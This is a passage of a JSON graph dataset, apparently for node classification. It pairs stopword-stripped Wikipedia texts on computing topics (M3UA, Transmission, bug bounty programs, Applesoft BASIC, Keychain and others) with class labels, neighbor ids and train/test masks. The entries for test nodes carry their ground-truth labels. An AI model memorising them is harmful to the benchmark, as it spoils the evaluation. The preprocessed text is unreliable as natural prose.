      11166,
      8614,
      8615,
      8617,
      1451,
      1970,
      1972,
      10166,
      1465,
      5563,
      7103,
      5057,
      1994,
      5069,
      9168,
      5586,
      10708,
      2005,
      9688,
      11225,
      8668,
      3551,
      998,
      9713,
      499,
      6643,
      10740,
      3065,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 705,
    "label": 8,
    "text": "Visit_filter:visit filter visit filters used web log analysis software include exclude data visit session specifying ranges types data let limit web log data analyzed letting focus relevant activity",
    "neighbors": [
      4640,
      6576,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 706,
    "label": 5,
    "text": "M3UA:m3ua m3ua stands mtp level 3 mtp3 user adaptation layer defined ietf sigtran working group replaces supersedes m3ua enables ss7 protocol user parts e.g isup sccp tup run ip instead telephony equipment like isdn pstn m3ua uses service sctp transmit messages network elements several owns pc uses sgw stp transit pointcode m3ua uses complex state machine manage indicate states running several m3ua messages mandatory make m3ua association peering fully functional asp asp acknowledge asp active asp active acknowledge others recommended notify destination audits daud open implementation m3ua standard found openss7 web site wireshark shipped dissector m3ua sample packets found wireshark wiki page shows isup packet samples including m3ua",
    "neighbors": [
      3168,
      706,
      7811,
      5704,
      842,
      7120,
      10864,
      7865,
      1437,
      3006
    ],
    "mask": "Train"
  },
  {
    "node_id": 707,
    "label": 3,
    "text": "The_Eidolon:eidolon eidolon one two games part lucasfilm games second wave december 1985 koronis rift took advantage fractal technology developed rescue fractalus enhancing eidolon rescue fractal mountains turned upside became inside cave addition common cassette formats atari commodore 64 versions supplied flippy disk one side atari version commodore 64 version atari version required xl/xe 64kb memory player discovers eidolon strange 19th-century vehicle abandoned laboratory player investigates device accidentally transported another dimension trapped vast maze-like cave creatures cave sensing energy emanating eidolon woken long slumber player soon finds chance survival lies mysterious vehicle powerful energy weapon objective eidolon successfully navigate game levels defeating dragon guardian end level player navigates maze collects energy orbs come four different colors red yellow green blue along way various enemies wake attack eidolon attempting absorb energy enemies also fire orbs eidolon red orbs absorbed pressing space bar right time replenish eidolon limited energy green orbs also power transform enemies different kinds enemies blue orbs freeze enemies temporarily giving player momentary advantage fight level contains three diamonds guarded enemy specific color defeating enemies collecting diamonds player proceed dragon guards exit eight levels game game player successfully defeated final dragon runs time zzap 64 gave game gold medal award overall 97 score summary reviews three reviewers lucasfilm original release yet containing outstanding graphics gameplay elements eidolon immaculate sic conception execution missed gregg williams computer gaming world disliked eidolon stated difficult koronis rift save game feature praising graphics sound ardai criticized game lack imagination get transported god-knows-where ... basically shoot everything sight reasonable—let alone responsible—way explore new world charles ardai later described game magazine one worst 1986 game positively reviewed retrospective article retro gamer magazine praised wonderfully atmospheric due technical achievement fractally created environment also considered ambitious original release 3 lucasfilm games used fractal routines overall described fascinating snapshot gaming history showed innovative immersive tense first-person style arcade-adventure could 8-bit platforms",
    "neighbors": [
      7586,
      748,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 708,
    "label": 5,
    "text": "Transmission_(BitTorrent_client):transmission bittorrent client transmission bittorrent client features variety user interfaces top cross-platform back-end transmission free software licensed terms gnu general public license parts mit license transmission allows users quickly download files multiple peers internet upload files adding torrent files via user interface users create queue files downloaded uploaded within file selection menus users customise downloads level individual files transmission also seeds automatically share downloaded content transmission allows assigning priorities torrents files within torrents thus potentially influencing files download first supports magnet uri scheme encrypted connections allows torrent-file creation peer exchange compatible vuze μtorrent includes built-in web server users control transmission remotely via web also supports automatic port-mapping using upnp/nat-pmp peer caching blocklists bad peers bandwidth limits dependent time-of-day globally per-torrent partial support ipv6 allows use multiple trackers simultaneously local peer discovery micro transport protocol µtp udp tracker support directly subscribing rss feeds containing torrent files automatic download third-party add-ons supply functionality macos-specific features include dock growl notifications automatic updates using sparkle universal binary version 2.22 transmission 1.60 later removed support mac os x v10.4 currently transmission 1.54 last version runs mac os x 10.4 although possible compile later versions source either downloading project web site using package manager like fink macports unsupported bugs specific 10.4 fixed starting transmission 2.30 apple mac intel cpu needed powerpc-based systems longer supported natively transmission back-end libtransmission also serves basis transmission daemon daemon supports web front-end called clutch older versions ported form basis update system video game playstation 3 well backend imageshack bittorrent service portable version available portableapps.com transmission set lightweight bittorrent clients gui cli daemon form incarnations feature simple intuitive interface top efficient cross-platform back-end several transmission clients different operating systems including unix-like macos beos/zeta operating system front-end built using native widget toolkits example transmission-gtk uses gtk+ interface transmission-qt qt interface transmission-cli command-line interface transmission-remote-cli ncurses interface transmission-daemon python-transmissionrpc python module implementing json-rpc client protocol transmission unofficial port transmission using command-line interface cli ios accomplished 3 march 2008 november 2010 itransmission another unofficial port released jailbroken iphones sporting gui capable downloading directly device wifi 3g transmission remote released android name transdroid currently support downloading directly devices windows transmission-qt built mingw daemon console tools built cygwin also two third-party guis transmission-remote-dotnet transmission remote gui well unofficial full builds transmission qt client. also unofficial full build transmission daemon run windows service unofficial full build transmission daemon running windows service used direct streaming downloading file port platforms enhanced streaming downloading file located github also ported maemo os nokia n810 internet tablet n900 smartphone well meego/harmattan os nokia n9 n950 smartphones download torrents device march 2016 palo alto networks reported transmission official website compromised tainted .dmg files uploaded site using apple developer signature bypass os x gatekeeper feature tainted packages installed ransomware application variant linux.encoder.1 recompiled mac known keranger encrypts user files attempts force users pay 1 bitcoin worth roughly us 404 time attack order get decryption pack transmission website advised mac users immediately upgrade new version removes malware-infected file apple revoked developer certificate used sign tainted package added package signature xprotect anti-malware system transmission default bittorrent client many unix linux distributions including joli os solaris ubuntu mandriva mint fedora ref name= distribution/download/bittorrent /ref puppy crunchbang zenwalk gnome flavor opensuse fonera ships routers transmission pre-installed cnet editor paul huges praised transmission simplicity lightweight well feature-packed april 2017 software ranked third p2p downloads mac cnet",
    "neighbors": [
      11394,
      4229,
      4490,
      6413,
      6797,
      9487,
      8848,
      9872,
      10254,
      3859,
      1172,
      5397,
      10646,
      11029,
      11413,
      9625,
      7450,
      5019,
      10522,
      1822,
      5407,
      10270,
      6691,
      3366,
      1960,
      5292,
      10924,
      7983,
      1970,
      9908,
      439,
      11577,
      3770,
      1471,
      1728,
      3649,
      1087,
      8640,
      9407,
      11073,
      3015,
      3792,
      4177,
      6993,
      7761,
      11221,
      1112,
      3676,
      5085,
      5343,
      9441,
      11363,
      3300,
      741,
      3428,
      3685,
      3813,
      5095,
      7913,
      4459,
      5612,
      8937,
      10221,
      10470,
      7921,
      370,
      8433,
      1908,
      3189,
      5492,
      5749,
      6264,
      6393,
      10995,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 709,
    "label": 3,
    "text": "International_Symposium_on_Computer_Architecture:international symposium computer architecture international symposium computer architecture isca annual academic conference computer architecture generally viewed top-tier field association computing machinery special interest group computer architecture acm sigarch institute electrical electronics engineers computer society technical sponsors isca participated federated computing research conference 1993 1996 1999 2003 2007 2011 2015 every year conference organized isca influential paper award presented annually isca sigarch tcca award given paper impact field area research development products ideas conference 15 years ago prior recipients include",
    "neighbors": [
      2113,
      995,
      9283,
      8229,
      9932,
      4144,
      4241,
      4308,
      9851
    ],
    "mask": "None"
  },
  {
    "node_id": 710,
    "label": 2,
    "text": "RDMA_over_Converged_Ethernet:rdma converged ethernet rdma converged ethernet roce network protocol allows remote direct memory access rdma ethernet network two roce versions roce v1 roce v2 roce v1 ethernet link layer protocol hence allows communication two hosts ethernet broadcast domain roce v2 internet layer protocol means roce v2 packets routed although roce protocol benefits characteristics converged ethernet network protocol also used traditional non-converged ethernet network network-intensive applications like networked storage cluster computing need network infrastructure high bandwidth low latency advantages rdma network application programming interfaces berkeley sockets lower latency lower cpu load higher bandwidth roce protocol allows lower latencies predecessor iwarp protocol exist roce hcas host channel adapter latency low 1.3 microseconds lowest known iwarp hca latency 2011 3 microseconds roce v1 protocol ethernet link layer protocol ethertype 0x8915 means frame length limits ethernet protocol apply 1500 bytes regular ethernet frame 9000 bytes jumbo frame roce v1.5 uncommon experimental non-standardized protocol based ip protocol roce v1.5 uses ip protocol field differentiate traffic ip protocols tcp udp value used protocol number unspecified left deployment select roce v2 protocol exists top either udp/ipv4 udp/ipv6 protocol udp destination port number 4791 reserved roce v2 since rocev2 packets routable roce v2 protocol sometimes called routable roce rroce although general delivery order udp packets guaranteed rocev2 specification requires packets udp source port destination address must reordered addition rocev2 defines congestion control mechanism uses ip ecn bits marking cnp frames acknowledgment notification software support roce v2 still emerging mellanox ofed 2.3 later roce v2 support also linux kernel v4.5 roce defines perform rdma ethernet infiniband architecture specification defines perform rdma infiniband network roce expected bring infiniband applications predominantly based clusters onto common ethernet converged fabric others expected infiniband keep offering higher bandwidth lower latency possible ethernet technical differences roce infiniband protocols roce protocols define perform rdma using ethernet udp/ip frames iwarp protocol defines perform rdma connection-oriented transport like transmission control protocol tcp roce v1 limited single ethernet broadcast domain roce v2 iwarp packets routable memory requirements large number connections along tcp flow reliability controls lead scalability performance issues using iwarp large-scale datacenters large-scale applications i.e large-scale enterprises cloud computing web 2.0 applications etc. also multicast defined roce specification current iwarp specification define perform multicast rdma reliability iwarp given protocol tcp reliable rocev2 hand utilizes udp far smaller overhead better performance provide inherent reliability therefore reliability must implemented alongside rocev2 one solution use converged ethernet switches make local area network reliable require converged ethernet support switches local area network prevents rocev2 packets traveling wide area network internet reliable another solution add reliability roce protocol i.e reliable roce adds handshaking roce provide reliability cost performance question protocol better depends vendor intel chelsio recommend exclusively support iwarp mellanox xilinx broadcom recommend exclusively support roce/rocev2 vendors involved network industry provide support protocols marvell microsoft linux kazan cisco supports roce vic rdma protocol protocols standardized iwarp standard rdma tcp defined ietf roce standard rdma ethernet defined ibta aspects could defined roce specification left addition protocol running ip assume underlying network guaranteed ordering assume congestion occur least one vendor offers rdma ethernet solution supports another wire protocol addition roce known use pfc lead network-wide deadlock popular vendors roce enabled equipment include",
    "neighbors": [
      3328,
      2723,
      3820,
      10924,
      367,
      6993,
      7411,
      10005,
      11413,
      10461,
      10303,
      863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 711,
    "label": 4,
    "text": "Bug_bounty_program:bug bounty program bug bounty program deal offered many websites organizations software developers individuals receive recognition compensation reporting bugs especially pertaining exploits vulnerabilities programs allow developers discover resolve bugs general public aware preventing incidents widespread abuse bug bounty programs implemented large number organizations including mozilla facebook yahoo google reddit square microsoft companies outside technology industry including traditionally conservative organizations like united states department defense started using bug bounty programs pentagon ’ use bug bounty programs part posture shift seen several us government agencies reverse course threatening white hat hackers legal recourse inviting participate part comprehensive vulnerability disclosure framework policy hunter ready initiated first known bug bounty program 1983 versatile real-time executive operating system anyone found reported bug would receive volkswagen beetle a.k.a bug return little decade later 1995 jarrett ridlinghafer technical support engineer netscape communications corporation coined phrase 'bugs bounty netscape encouraged employees push whatever takes get job done ridlinghafer recognized netscape many enthusiasts evangelists products seemed even fanatical particularly mosaic/netscape/mozilla browser started investigate phenomenon detail discovered many netscape enthusiasts actually software engineers fixing product bugs publishing fixes workarounds ridlinghafer thought company leverage resources sat wrote proposal 'netscape bugs bounty program presented manager turn suggested ridlinghafer present next company executive team meeting next executive team meeting attended james barksdale marc andreessen vps every department including product engineering member given copy 'netscape bugs bounty program proposal ridlinghafer invited present idea netscape executive team everyone meeting embraced idea except vp engineering want go forward believing waste time resources however vp engineering overruled ridlinghafer given initial 50k budget run proposal first official 'bugs bounty program launched 1995 program huge success mentioned many books detailing netscape successes august 2013 computer science student named khalil used exploit post letter facebook timeline site founder mark zuckerberg according hacker tried report vulnerability using facebook bug bounty program vague incomplete report response team told vulnerability actually bug facebook started paying researchers find report security bugs issuing custom branded “ white hat ” debit cards reloaded funds time researchers discover new flaws “ researchers find bugs security improvements rare value find ways reward ” ryan mcgeehan former manager facebook ’ security response team told cnet interview “ exclusive black card another way recognize show conference show card say ‘ special work facebook. ’ ” 2014 facebook stopped issuing debit cards researchers 2016 uber experienced security incident individual accessed personal information 57 million uber users worldwide individual supposedly demanded ransom 100,000 order destroy users ’ data congressional testimony uber ciso indicated company verified data destroyed paying 100,000 mr. flynn expressed regret uber disclose incident 2016 part response incident uber worked partner hackerone update bug bounty program policies among things thoroughly explain good faith vulnerability research disclosure india either first second largest number bug hunters world depending report one cites also tops facebook bug bounty program largest number valid bugs “ india came top number valid submissions 2017 united states trinidad tobago second third place respectively ” facebook quoted post yahoo severely criticized sending yahoo t-shirts reward security researchers finding reporting security vulnerabilities yahoo sparking came called t-shirt-gate high-tech bridge geneva switzerland-based security testing company issued press release saying yahoo offered 12.50 credit per vulnerability could used toward yahoo-branded items t-shirts cups pens store ramses martinez director yahoo security team claimed later blog post behind voucher reward program basically paying pocket eventually yahoo launched new bug bounty program october 31 year allows security researchers submit bugs receive rewards 250 15,000 depending severity bug discovered similarly ecava released first known bug bounty program ics 2013 criticized offering store credits instead cash incentivize security researchers ecava explained program intended initially restrictive focused human safety perspective users integraxor scada ics software october 2013 google announced major change vulnerability reward program previously bug bounty program covering many google products shift however program broadened include selection high-risk free software applications libraries primarily designed networking low-level operating system functionality submissions google found adherent guidelines would eligible rewards ranging 500 3133.70 2017 google expanded program cover vulnerabilities found applications developed third parties made available google play store similarly microsoft facebook partnered november 2013 sponsor internet bug bounty program offer rewards reporting hacks exploits broad range internet-related software 2017 github ford foundation sponsored initiative managed volunteers uber microsoft facebook adobe hackerone software covered ibb includes adobe flash python ruby php django ruby rails perl openssl nginx apache http server phabricator addition program offered rewards broader exploits affecting widely used operating systems web browsers well internet whole march 2016 peter cook announced us federal government first bug bounty program hack pentagon program program ran april 18 may 12 1400 people submitted 138 unique valid reports hackerone total us department defense paid 71,200 june secretary defense ash carter met two participants david dworken craig arendt honor participation program open bug bounty crowd security bug bounty program established 2014 allows individuals post website security vulnerabilities hope reward affected website operators",
    "neighbors": [
      5636,
      8582,
      1547,
      10894,
      3473,
      3092,
      4374,
      5404,
      9245,
      8735,
      3619,
      3237,
      7590,
      7983,
      3380,
      5813,
      8644,
      4813,
      11213,
      11221,
      865,
      1764,
      10726,
      3944,
      8554,
      2804,
      1912
    ],
    "mask": "Test"
  },
  {
    "node_id": 712,
    "label": 9,
    "text": "Applesoft_BASIC:applesoft basic applesoft basic dialect microsoft basic developed marc mcdonald ric weiland supplied apple ii series computers supersedes integer basic basic rom apple ii series computers original apple ii model also referred fp basic floating point apple dos command used invoke instead codice_1 integer basic applesoft basic supplied microsoft name derived names apple microsoft apple employees including randy wigginton adapted microsoft interpreter apple ii added several features first version applesoft released 1977 cassette tape lacked proper support high-resolution graphics applesoft ii made available cassette disk rom apple ii plus subsequent models released 1978 latter version syntax differences support apple ii high-resolution graphics modes usually synonymous term applesoft applesoft compiler tasc applesoft compiler produced microsoft 1981 steve wozniak wrote integer basic apple ii implement support floating point math primarily interested writing games task integers alone sufficient 1976 microsoft developed microsoft basic basic interpreter mos technology 6502 time production computer used upon learning apple 6502 machine microsoft asked company interested licensing basic steve jobs replied apple already one apple ii unveiled public west coast computer faire april 1977 became available sale june one common customer complaints computer basic lack floating-point capability integer basic limited whole numbers −32768 32767 caused problems users attempting write business applications steve wozniak never added floating point capabilities integer basic consider necessary gaming educational software two primary tasks envisioned apple ii wozniak—the person understood integer basic well enough add floating point features—was busy disk ii drive controller apple dos apple turned microsoft making things problematic rival commodore pet personal computer floating point-capable basic interpreter beginning applesoft license also saved microsoft near-bankruptcy licensed basic commodore pet agreement proved unexpectedly costly apple reportedly obtained eight-year license applesoft basic microsoft flat fee 31,000 renewing 1985 arrangement gave microsoft rights source code apple macintosh version basic applesoft designed backwards-compatible integer basic uses core microsoft 6502 basic implementation includes using get command detecting key presses requiring spaces program lines applesoft basic slower integer basic many features older basic lacks conversely applesoft lacks codice_9 remainder operator present integer basic adapting basic apple ii tedious job apple received source listing microsoft 6502 basic proved buggy also required addition integer basic commands since apple 6502 assembler hand development team forced send source code phone lines call computer outfit offered compiler services extremely tedious slow process call computer lost source code due equipment malfunction one programmers cliff huston used imsai 8080 computer cross assemble basic source applesoft similar commodore basic 2.0 aside features inherited integer basic minor differences applesoft lack bitwise operators otherwise basic programs utilize hardware-dependent features run basics pr statement used redirect output expansion card used redirect input expansion card slot number card specified pr within statement computer lock card present slot require reboot pr 0 restore output 40 column screen 0 keyboard pr statement used redirect output printer e.g x slot number containing printer port card send basic program listing printer user would type outputting printer necessary execute pr 0 statement reset output screen pr 6 cause applesoft boot disk drives although disk ii controller slot usually slot 6 pr 3 switch 80 column text mode 80 column card present 80 column cards also add 12 new control codes generated chr function enhanced apple iie iic models mousetext character set include another two control codes enable disable feature commodore basic numeric variables stored 40-bit floating point variable requires five bytes memory programmer may designate variables integer following percent sign case use two bytes limited range -32768 32767 however basic internally converts back floating point percent sign also takes additional byte program code practice feature useful reducing memory usage large array variables rnd function generates pseudorandom fractional number 0 1. returns recently generated random number rnd negative number jump point sequence determined particular negative number used rnd positive value generate new random number sequence dependent actual value given random numbers generated via formula based previously generated value thus truly random locations 4e 4f system cycles values continuously waiting user keystrokes peeked provide truly random values use seed negated rnd like implementations microsoft basic applesoft discards spaces outside strings comments program lines codice_10 adds spaces displaying code sake readability since list code add space every tokenized keyword often produces two spaces row one would suffice readability default prompt codice_11 question mark codice_12 add leading space front numbers coleco claimed adam home computer smartbasic source-code compatible applesoft microsoft licensed basic compatible applesoft vtech laser 128 clone several early models apple ii applesoft basic support use lowercase letters programs except strings thus applesoft display lowercase letters recognize part program hence codice_12 valid command codice_14 codice_15 unrecognizable result syntax error applesoft lacks several commands functions common non-6502 microsoft basic interpreters applesoft like integer basic come built-in commands file disk handling feature save programs load programs cassette tape apple ii disk operating system known simply dos augments language provide abilities unlike integer basic applesoft basic variable names significant two letters made longer first two letters used instance low loss treated variable attempting assign value loss overwrites value assigned low furthermore language used tokenization programmer avoid using consecutive letters also applesoft commands operations one use name score variable interprets boolean operator thus rendering sc e one use background command gr invokes low-resolution graphics mode case creating syntax error sound support option codice_12 ascii bell character sound system alert beep codice_21 command click speaker language fast enough produce baritone buzz repeated clicks programs however store machine-language routine called generate electronic musical tones spanning several octaves applesoft supports apple ii lores graphics display 40 color blocks horizontally 48 blocks vertically displayed 16 colors commands plot individual blocks horizontal vertical lines well hires mode six colors fixed subset lores palette 16 colors displayed resolution 280 horizontally 192 vertically limitations horizontal placement command draw points diagonal lines onscreen beginning apple iie new double-high resolution mode based mode introduced apple iii computer became available machines 128k memory mode essentially duplicates resolution original hires mode including 16 colors lores palette applesoft however provide support mode must rely supplemental machine-language routines order utilize additional new graphics modes apple iigs likewise supported provision exists mixing text graphics except limited hardware split screen apple ii four lines text bottom screen vector-based shape tables used draw objects hires graphics slow comparison routines draw bitmaps directly also support defining horizontal vertical lines diagonals curves supported although shapes drawn rotated various angles lines ostensibly defined horizontal vertical appear diagonal addition shapes drawn scaled larger sizes applesoft basic extended two means ampersand command usr function two features call low-level machine-language routines stored memory useful routines need fast require direct access arbitrary functions data memory usr function takes one numerical argument programmed derive return calculated function value used numerical expression effectively shorthand call address predefined deficiency applesoft error-trapping onerr means system stack would reset error-handling routine invoke resume potentially leading crash error-handling employ resume avoid problem call -3288 equivalent 62248 exiting routine wozniak originally referred integer basic game basic written could implement breakout clone new computer action games written applesoft basic large part use floating-point numbers math operations degrades performance applesoft basic programs stored linked list lines codice_22 codice_23 takes linear time programs subroutines top reduce time calling unlike integer basic applesoft basic convert literal numbers source code internal binary format time source line entered rather string digits stored entered relatively slow conversion happens runtime whenever line executed since variable lookup often faster conversion generally faster store numeric constants used inside loops variables loop entered hello world applesoft basic entered following multiple commands included line code separated colon codice_24 codice_25 used applesoft basic almost versions microsoft basic shortcut print though spelling word acceptable canonical—applesoft converted entered programs token print thus memory actually saved using thus either appears print program listed program appears codice_10 command applesoft ii basic initially released mid-1978 came cassette tape could loaded memory via apple ii machine language monitor enhanced apple ii+ replaced original ii 1979 applesoft included rom automatically started power-up bootable floppy disk present conversely integer basic removed rom turned executable file dos 3.3 disk original applesoft stored ram documented reference manual november 1977 smaller interpreter code later applesoft ii occupying 8½ kb memory instead 10 kb used later applesoft ii consequently lacks number command features developed later mainstream version well several later version would already present apple integer basic addition low-resolution graphics commands different names integer basic/applesoft ii counterparts command names form pltx gr color= plot hlin vlin called pltg pltc pltp plth pltv respectively command returning text mode known text versions simply tex carries proviso last statement program line applesoft basic 1.x closer microsoft original 6502 basic code later applesoft ii retained memory size prompt displayed microsoft copyright notice maintain consistency integer basic ok prompt microsoft code replaced character applesoft 1.x also prompted user upon loading wished disable rem statement let keyword assignment statements exchange lores graphics commands usr function also defined differently serving stand-in absent call command argument passing numerical value machine-language routine instead call-address routine hook pre-define address several examples manual use function access system monitor rom routines short user-routines manipulate rom routines mention made code calculate value returned function function always shown assigned dummy variables without action set value user-code receive meaningless value handed back even accessed rom routines return values examples provide service pdl scrn functions merely values stored user-routines locations separately peeked subsequent statement unlike integer basic applesoft ii boolean operators perform bitwise operations 16-bit integer values given values outside range error results terms plt aforementioned appear list reserved words explained anywhere manual",
    "neighbors": [
      2304,
      3718,
      7691,
      5260,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      5677,
      8494,
      303,
      7343,
      7983,
      4530,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      8767,
      4674,
      8774,
      10750,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      3045,
      5733,
      10083,
      2282,
      11243,
      2541,
      8429,
      7281,
      5747,
      759,
      6778,
      2045,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 713,
    "label": 2,
    "text": "Keychain_(software):keychain software keychain password management system macos developed apple introduced mac os 8.6 included subsequent versions mac os known macos keychain contain various types data passwords websites ftp servers ssh accounts network shares wireless networks groupware applications encrypted disk images private keys certificates secure notes macos keychain files stored ~/library/keychains/ subdirectories /library/keychains/ /network/library/keychains/ keychain access gui application located utilities folder applications folder free open source software released terms apsl command line equivalent keychain access /usr/bin/security keychain file stores variety data fields including title url notes password passwords secure notes encrypted triple des default keychain file login keychain typically unlocked login user login password although password keychain instead different user ’ login password adding security expense convenience keychain access application permit setting empty password keychain keychain may set automatically locked computer idle time locked manually keychain access application locked password re-entered next time keychain accessed unlock overwriting file ~/library/keychains/ new one e.g part restore operation also causes keychain lock password required next access login keychain protected login password keychain password changed whenever login password changed within logged session macos shared mac/non-mac network possible login keychain password lose synchronization user login password changed non-mac system also password changed directory service like active directory open directory password changed another admin account e.g using system preferences network administrators react deleting keychain file logout new one created next time user logs means keychain passwords remembered one session next even login password changed happens user restore keychain file ~/library/keychains/ backup lock keychain need unlocked next use keychain access macos application allows user access keychain configure contents including passwords websites web forms ftp servers ssh accounts network shares wireless networks groupware applications encrypted disk images etc unlocks locks displays passwords saved system dynamically linked user login password well managing root certificates keys secure notes graphical user interface displays various keychains usually least two login keychain system keychain also includes keychain first aid utility removed 10.11.2 update repair problems keychains various events cause problems keychains sometimes solution problem delete keychain also deletes passwords stored keychain create new one usually found utilities folder applications macos ancillary application macos subject updates via software update thus moved utilities folder also included command-line tool access keychain called security keychains initially developed apple e-mail system powertalk early 1990s among many features powertalk used plug-ins allowed mail retrieved wide variety mail servers online services keychain concept naturally fell code used powertalk manage user various login credentials various e-mail systems powertalk could connect passwords easily retrievable due encryption yet simplicity interface allowed user select different password every system without fear forgetting single password would open file return time implementations concept available platforms keychain one parts powertalk obviously useful suggested promoted become part basic mac os due internal politics kept inside powertalk system therefore available mac users return steve jobs 1997 keychain concept revived now-discontinued powertalk point time concept longer unusual still rare see keychain system associated particular piece application software typically web browser keychain later made standard part mac os 9 included mac os x first commercial versions keychain distributed ios osx ios version simpler applications run mobile devices typically need basic keychain features example features acls access control lists sharing keychain items different apps present thus ios keychain items accessible app created",
    "neighbors": [
      9732,
      1542,
      4615,
      510,
      1549,
      3598,
      5647,
      9744,
      1042,
      6700,
      3629,
      4657,
      1074,
      1592,
      9784,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      3167,
      2149,
      3691,
      8303,
      6771,
      2676,
      6264,
      2686,
      7806,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      5784,
      4251,
      3228,
      2207,
      1699,
      171,
      5292,
      8877,
      1710,
      3248,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      9418,
      3790,
      213,
      3286,
      9430,
      3289,
      4318,
      231,
      6377,
      2282,
      9451,
      4844,
      2288,
      7928,
      8441,
      3324,
      7422,
      11521,
      2819,
      1796,
      9999,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      9022,
      1346,
      4933,
      838,
      9035,
      1878,
      6495,
      9063,
      4457,
      10602,
      10608,
      6539,
      9100,
      5520,
      9109,
      3485,
      1439,
      6048,
      9123,
      11171,
      8114,
      6093,
      7118,
      9168,
      3035,
      4571,
      8674,
      4068,
      5093,
      9700,
      487,
      8170,
      10221,
      7154,
      5619,
      11257,
      7163,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 714,
    "label": 8,
    "text": "Bingbot:bingbot bingbot web-crawling robot type internet bot deployed microsoft october 2010 supply bing collects documents web build searchable index bing search engine performs function google googlebot typical user agent string bingbot nowiki mozilla/5.0 compatible bingbot/2.0 +http //www.bing.com/bingbot.htm /nowiki appears web server logs tell webmaster requesting file webmaster able use included agent identifier bingbot disallow allow access site default access allowed n't want grant access use robots exclusion standard block relying assumed good behaviour bingbot use server specific means relying web server blocking",
    "neighbors": [
      3744,
      225,
      8769,
      3875,
      2566,
      4473,
      2318,
      944,
      113,
      11284,
      119,
      1240,
      1913,
      2459
    ],
    "mask": "Test"
  },
  {
    "node_id": 715,
    "label": 4,
    "text": "Controlled_Access_Protection_Profile:controlled access protection profile controlled access protection profile also known capp common criteria security profile specifies set functional assurance requirements information technology products software systems conform capp standards provide access controls capable enforcing access limitations individual users data objects capp-conformant products also provide audit capability records security-relevant events occur within system capp intended protection software systems users assumed non-hostile well-managed requiring protection primarily threats inadvertent casual attempts breach security protections intended applicable circumstances protection required determined attempts hostile well-funded attackers fully address threats posed malicious system development administrative personnel generally higher level access capp derived requirements c2 class u.s. department defense trusted computer system evaluation criteria material upon requirements based",
    "neighbors": [
      8904,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 716,
    "label": 2,
    "text": "Dispose_pattern:dispose pattern object-oriented programming dispose pattern design pattern resource management pattern resource held object released calling method – usually called codice_1 codice_2 codice_3 codice_4 similar – releases resources object holding onto many languages offer language constructs avoid call dispose method explicitly common situations dispose pattern primarily used languages whose runtime environment automatic garbage collection see motivation thus may styled manual resource management languages automatic memory management wrapping resources objects object-oriented form encapsulation underlies dispose pattern resources typically represented handles abstract references concretely usually integers used communicate external system provides resource example files provided operating system specifically file system many systems represents files file descriptor integer representing file handles used directly storing value variable passing argument functions use resource however frequently useful abstract handle example different operating systems represent files differently store additional auxiliary data handle handles stored field record along data opaque data type provides information hiding user abstracted actual representation example c file input/output files represented objects codice_5 type confusingly called file handles language-level abstraction stores operating system handle file file descriptor together auxiliary information like i/o mode reading writing position stream objects created calling codice_6 object-oriented terms factory acquires resource returns pointer resource released calling codice_7 pointer codice_5 object code note codice_7 function codice_10 parameter object-oriented programming instead instance method file object python precisely dispose pattern differs syntax code structure traditional file opening closing resources managed exactly way acquired constructor factory released explicit codice_1 codice_2 method fundamental problem dispose pattern aims solve resources expensive example may limit number open files thus released promptly finalization work often needed particularly i/o flushing buffers ensure data actually written resource unlimited effectively unlimited explicit finalization necessary important release fact short-lived programs often explicitly release resources due short run time unlikely exhaust resources rely runtime system operating system finalization however general resources must managed particularly long-lived programs programs use many resources safety ensure data written explicit disposal means resource finalization release deterministic prompt codice_2 method complete done alternative requiring explicit disposal tie resource management object lifetime resources acquired object creation released object destruction approach known resource acquisition initialization raii idiom used languages deterministic memory management e.g c++ case example resource acquired file object created scope variable codice_14 exited file object codice_14 refers destroyed part resource released raii relies object lifetime deterministic however automatic memory management object lifetime concern programmer objects destroyed point longer used abstracted indeed lifetime often deterministic though may notably reference counting used indeed cases guarantee objects ever finalized program terminates may finalize objects instead let operating system reclaim memory finalization required e.g. flush buffers data loss occur thus coupling resource management object lifetime dispose pattern allows resources released promptly giving implementation flexibility memory management cost resources must managed manually tedious error-prone key problem dispose pattern codice_2 method called resource leaked common cause early exit function due early return exception example function returns first return file never closed resource leaked intervening code raises exception function exits early file never closed resource leaked handled codice_17 construct ensures finally clause always executed exit generically codice_17 construct necessary proper exception safety since codice_19 block enables execution cleanup logic regardless exception thrown codice_20 block one disadvantage approach requires programmer explicitly add cleanup code codice_19 block leads code size bloat failure lead resource leakage program make safe use dispose pattern less verbose several languages kind built-in support resources held released block code c language features codice_22 statement automatically calls codice_23 method object implements codice_24 interface equal similarly python language codice_25 statement used similar effect context manager object context manager protocol requires implementing codice_26 codice_27 methods get automatically called codice_25 statement construct prevent duplication code would otherwise occur codice_20/codice_19 pattern java language introduced new syntax called codice_20-with-resources java version 7 used objects implement autocloseable interface defines method close beyond key problem correct resource management presence returns exceptions heap-based resource management disposing objects different scope created many complexities associated dispose pattern problems largely avoided raii however common simple use complexities arise acquire single resource something automatically release fundamental problem resource longer class invariant resource held object creation disposed object still live point resource may available object tries use example trying read closed file means methods object use resource potentially fail concretely usually returning error raising exception practice minor use resources usually fail reasons well example trying read past end file methods already might fail resource adds another possible failure standard way implement add boolean field object called codice_32 set true codice_2 checked guard clause methods use resource raising exception codice_34 .net object disposed possible call codice_2 object may indicate programming error object holding resource must disposed exactly simpler robust thus usually preferable codice_2 idempotent meaning calling multiple times calling easily implemented using boolean codice_32 field checking guard clause start codice_2 case returning immediately rather raising exception java distinguishes disposable types implement autocloseable disposable types dispose idempotent subtype closeable disposal presence inheritance composition objects hold resources analogous problems destruction/finalization via destructors finalizers since dispose pattern usually language support boilerplate code necessary firstly derived class overrides codice_2 